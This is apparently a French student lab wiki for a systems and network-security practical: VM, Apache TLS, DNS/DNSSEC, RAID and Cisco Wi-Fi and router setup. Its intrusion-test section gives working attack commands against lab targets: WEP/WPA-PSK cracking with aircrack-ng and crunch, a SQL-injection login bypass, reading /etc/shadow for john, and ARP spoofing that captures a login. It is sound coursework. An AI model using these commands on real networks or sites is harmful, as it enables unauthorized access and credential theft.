            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.6&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 6&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 6&lt;br /&gt;
&lt;br /&gt;
===Configuration VRPP===&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 ip 10.60.106.254&lt;br /&gt;
 (config-if)# vrrp 46 preempt&lt;br /&gt;
 (config-if)# vrrp 46 priority 110&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 address-family ipv4&lt;br /&gt;
 (config-if-vrrp)# address 10.60.106.254&lt;br /&gt;
 (config-if-vrrp)# preempt&lt;br /&gt;
 (config-if-vrrp)# vrrpv2&lt;br /&gt;
&lt;br /&gt;
===Configuration IPv6===&lt;br /&gt;
&lt;br /&gt;
Afin d'effectuer la configuration IPv6 nous avons procédé aux étapes suivantes :&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E :&lt;br /&gt;
&lt;br /&gt;
 (config)# int vlan 306&lt;br /&gt;
 (config-if)# no shut&lt;br /&gt;
 (config-if)# ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
 (config-if)# ipv6 enable&lt;br /&gt;
 (config-if)# ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)# ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)# ipv6 nd router-preference High&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200 :&lt;br /&gt;
&lt;br /&gt;
 (config)#int vlan 306&lt;br /&gt;
 (config-if)#no shut&lt;br /&gt;
 (config-if)#ip address 10.60.106.2 255.255.255.0&lt;br /&gt;
 (config-if)#ipv6 enable&lt;br /&gt;
 (config-if)#ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)#ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)#ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Notre machine arrive à recupérer une adresse IP&lt;br /&gt;
&lt;br /&gt;
 IMA5sc-R1#sh ip dhcp bin               &lt;br /&gt;
 IMA5sc-R1#sh ip dhcp binding &lt;br /&gt;
 IP address       Client-ID/	 	 Lease expiration        Type&lt;br /&gt;
 Hardware address&lt;br /&gt;
 10.60.106.100    0146.f879.9094.cf       Jun 01 2000 04:53 AM    Automatic&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54654</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54654"/>
				<updated>2020-12-14T18:36:45Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Configuration IPv6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec_morillon.png|right]]&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
